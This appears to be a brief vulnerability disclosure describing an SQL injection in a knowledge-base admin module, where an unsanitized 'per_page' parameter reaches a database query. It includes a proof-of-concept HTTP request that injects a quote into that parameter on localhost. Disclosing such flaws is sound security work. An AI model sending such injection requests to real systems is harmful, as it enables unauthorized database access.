The searchArticles
function in the KB module
makes a call to the getSimpleResultSet
function, with the per_page
parameter taken from the user without sanitizing before entering the query, leading to the attacker being able to manipulate the query.
GET /admin/kb?CSRFToken=4632faf87f0cd5fb8b324915263a01fa&_url=%2Fadmin%2Fkb&search=123&per_page=123' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Referer: http://localhost/admin/kb
Cookie: PHPSESSID=1nkrr4p8ikra2g2sov3fubp273